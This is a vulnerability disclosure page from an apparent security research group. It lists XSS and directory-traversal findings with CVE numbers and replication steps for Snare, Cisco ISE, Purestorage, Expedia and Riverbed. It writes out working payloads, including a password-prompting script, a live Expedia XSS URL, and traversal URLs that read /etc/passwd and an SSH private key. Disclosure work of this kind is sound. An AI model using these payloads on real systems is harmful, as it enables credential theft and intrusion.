Research

Arthrocyber Security Research:

  • Find vulnerability details from various vendors.
  • Vendor received adequate disclosure window.

Vulnerability Details:

  1. Intersect Alliance Stored XSS

  2. Cisco ISE Reflective XSS

  3. Purestorage Stored XSS

  4. Expedia Reflective XSS

  5. Riverbed App Response Directory Traversal

  6. Major Bank Reflective XSS

Intersect Alliance Stored XSS


Description:

The Intersect Alliance Snare web application failed to properly sanitize use supplied input, resulting in a stored Cross Site Scripting attack.

References:

Vendor: Intersect Alliance

National Vulnerability Database: NIST CVE-2017-5998 

Original Release Date: 2/17/2017

Lab Details:

Software Version: SNARE Epilog for Unix version 1.5

Server: Linux 6.5 Running Apache

Steps to replicate vulnerability:

Location: Web Admin Portal > Log Configuration > Add > Select Log Type >
"Generic log format (default)"Log File >

"<><script>var data=prompt("Pass ");if(data!=  null){alert("OK "+data);}else{alert("x");}</script>

Once payload has been saved, click on view "Modify" stored XSS will then execute

Using the prompt function we asked for a password

Stored XSS Prompt 

We echo the password back

Disclosure:
The vendor was made aware of the vulnerability on November, 2016. The vendor acknowledge the vulnerability, they indicated they would implement a fix early January, 2017.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
Intersect alliance

[Affected Product Code Base]
snare - SNARE Epilog for UNIX version 1.5

Echo password

Cisco ISE Reflective XSS


Description:

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a reflective cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device.

References:

Vendor: Cisco ISE

National Vulnerability Database: NIST CVE-2017-6605 

Original Release Date: 3/15/2017

Lab Details:

Software Version: Cisco Identity Service Engine Version 2.1.0.474

Server: Firefox browser

Steps to replicate vulnerability:

Location

  1. Authenticate to Cisco ISE via the web portal
  2. Create a dashboard and name it test_dashboard
  3. Edit the created dashboard test_dashboard and rename it
  4. Rename it to

    <svg onload="alert('Reflective XSS 1-19-17')">

  5. Refreshing the page will execute the payload causing a reflected cross site scripting attack

     

Payload is executed:

XSS

 

Purestorage Stored XSS


Description:

The Purestorage web application failed to properly sanitize use supplied input, resulting in a stored Cross Site Scripting attack


Vendor: Purestorage

National Vulnerability Database: NIST CVE-2017-7352 

Original Release Date: 3/30/2017

Lab Details:

Software Version: Purestorage version 4.7.5

Browser: Firefox browser

Steps to replicate vulnerability:

Location: System > Configuration > SNMP > Click on the gear icon located on the right "Add SNMP Trap Manager" > On the 'Add SNMP Trap Manager' form enter the following payload and click 'Save' >

<script>prompt(2015)</script>

Once payload has been saved, click on view "Modify" stored XSS will then execute

Stored XSS Prompt

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Disclosure:
The vendor was made aware of the vulnerability on March, 2017.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
Purestorage

[Affected Product Code Base]
Purestorage - 4.7.5

[Affected Component]
The parameter "host" under: 'System > Configuration > SNMP >Add SNMP Trap Manager' is vulnerable to stored XSS.

[Attack Type]
Remote

Expedia Reflective XSS


Description:

The Expedia web application failed to properly sanitize use supplied input, resulting in a reflective Cross Site Scripting attack

References:


Vendor: Expedia

National Vulnerability Database: N/A

Original Release Date: 3/31/17

Lab Details:

Browser: Firefox browser

Steps to replicate vulnerability:

Payload:

https://www.expedia.com/Cruise-Search?destination=caribbean%27%22--!%3E%3CSvg%3E%3CSet%20/Onbegin=confirm`Reflective_XSS\nArthrocyber_3_17_17`%3E&earliest-departure-date=2017-03-01&latest-departure-date=2017-3-31

Payload is process by server and XSS is triggered

Expedia XSS

 

Disclosure:
The vendor was made aware of the vulnerability on March, 2017. The vendor acknowledge and fixed the vulnerability.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
Expedia

[Affected Product Code Base]
N/A

[Affected Component]
The parameter "destination" did not properly sanitize user input.

[Attack Type]
Remote

Riverbed App Response Directory Traversal


Description:

The Riverbed web application failed to properly sanitize use supplied input, resulting in directory traversal


Vendor: Riverbed

National Vulnerability Database: NIST CVE-2017-7693 

Original Release Date: 4/11/2017

Lab Details:

Software Version: OPNET App Response Xpert (ARX) version 9.6.1

Browser: Firefox browser

Steps to replicate vulnerability:

Location: Navigate to https://x.x.x.x/UiWebInsights/WebInsights.html log in to the application and request submit the following URL payloads

https://x.x.x.x/admin/viewer_script.jsp?args=-f /etc/group -s 1 -e 100 -l 100 -x x -p x &_=
https://x.x.x.x/admin/viewer_script.jsp?args=-f /etc/passwd -s 1 -e 100 -l 100 -x x -p x &_=
https://x.x.x.x/admin/viewer_script.jsp?args=-f /etc/ssh/ssh_host_rsa_key -s 1 -e 100 -l 100 -x x -p x &_=

After the payload is process by the server, the specified content is received in our example etc/group - etc/passwd - etc/ssh/ssh_host_rsa_key are returned

/etc/group

etc group

 

/etc/passwd

etc passwd

 

/etc/ssh/ssh_host_rsa_key

etc passwd

 

Disclosure:
The vendor was made aware of the vulnerability on April, 2017.

[Vulnerability Type]
Directory Traversal

[Vendor of Product]
Riverbed

[Affected Product Code Base]
OPNET App Response Xpert (ARX) version 9.6.1

[Affected Component]
The “viewer_script.jsp” script did not properly sanitize user input. Using a specially crafted payload, it was possible to traverse and read sensitive files on the file system based on the role of the user logging into the application. An account with lower right was not able to view the SSH private key, but was still able to view the /etc/passwd file. .

[Attack Type]
Remote

Major Bank Reflective XSS (Pending Vendor)